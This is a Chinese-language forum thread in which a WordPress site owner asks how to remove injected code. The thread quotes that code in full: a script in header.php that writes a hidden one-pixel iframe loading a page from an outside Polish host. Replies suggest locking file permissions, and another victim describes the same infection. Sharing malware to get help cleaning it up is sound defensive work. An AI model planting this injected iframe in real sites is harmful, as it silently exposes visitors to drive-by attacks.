我的(WordPress的)網站似乎被黑客入侵,代碼被添加到主要index.php文件,主題index.php文件和主題header.php文件。WordPress的黑客注入JavaScript/iframes
這部分來自於header.php中
#f524d6#
<script type=\"text/javascript\" language=\"javascript\" >
(function() { var kilun = document.createElement('iframe'); kilun.src = 'http://hosting3081247.az.pl/cgi-bin/counter.php'; kilun.style.position = 'absolute'; kilun.style.border = '0'; kilun.style.height = '1px'; kilun.style.width = '1px'; kilun.style.left = '1px'; kilun.style.top = '1px'; if (!document.getElementById('kilun')) { document.write('<div id=\'kilun\'></div>'); document.getElementById('kilun').appendChild(kilun); }})();</script>";
#/f524d6#
有人可以告訴我如何刪除這個?它在移除代碼行後返回。
更改文件的權限,以便PHP無法寫入它,刪除代碼,然後檢查錯誤日誌中的哪個文件couldn'打開它。 (它可能行不通,但值得一試。) – Ryan
這不僅僅是Wordpress。我今天早上在我的網站上發現了這個。搜索後,我發現許多其他網站都有相同的代碼,儘管在波蘭,斯洛伐克和瑞典都提到了地址。我的密碼被改變了,文件被清理了,並且一個早上丟失了。我很想知道是否有人確定這些網站正在嘗試做什麼。 – 2012-12-12 20:59:34